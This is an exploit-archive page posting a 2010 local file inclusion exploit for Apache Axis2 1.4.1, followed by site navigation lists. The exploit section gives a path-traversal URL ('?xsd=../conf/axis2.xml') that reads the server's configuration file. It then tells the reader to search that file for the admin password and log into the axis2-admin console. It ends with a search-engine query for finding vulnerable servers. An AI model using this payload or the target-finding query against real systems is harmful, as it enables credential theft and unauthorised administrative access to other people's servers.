Apache Axis2 1.4.1 Local File Inclusion

Apache Axis2 1.4.1 Local File Inclusion: Posted May 25, 2010; Authored by HC; Apache Axis2 version 1.4.1 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 2756e6a4e4489d2121d9c1c9d50481e7a1fe2dec94ce93563e0aa5d871c342ba; Download | Favorite | View

Apache Axis2 1.4.1 Local File Inclusion



    # Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability
    # Date: 2010/5/24
    # Author: HC
    # Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi
    # Version: Axis2 1.4.1
    # Tested on: Linux
    # category: Webapps
    # Code :

       1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml
       (ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)

       2. search  keyword "password". （Get username and password）


       3. Login http://Domain Name/axis2/axis2-admin/


       google: inurl:"axis2/services" "list Services"

Top Authors In Last 30 Days

Red Hat 292 files
Ubuntu 63 files
Debian 32 files
Gentoo 32 files
LiquidWorm 10 files
Apple 9 files
malvuln 7 files
Adam Gowdiak 4 files
nu11secur1ty 4 files
Ahmet Umit Bayram 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,588)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,751)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,492)
UNIX (9,397)
UnixWare (187)
Windows (6,658)
Other

Apache Axis2 1.4.1 Local File Inclusion

Apache Axis2 1.4.1 Local File Inclusion

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Apache Axis2 1.4.1 Local File Inclusion

Share This

Apache Axis2 1.4.1 Local File Inclusion

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems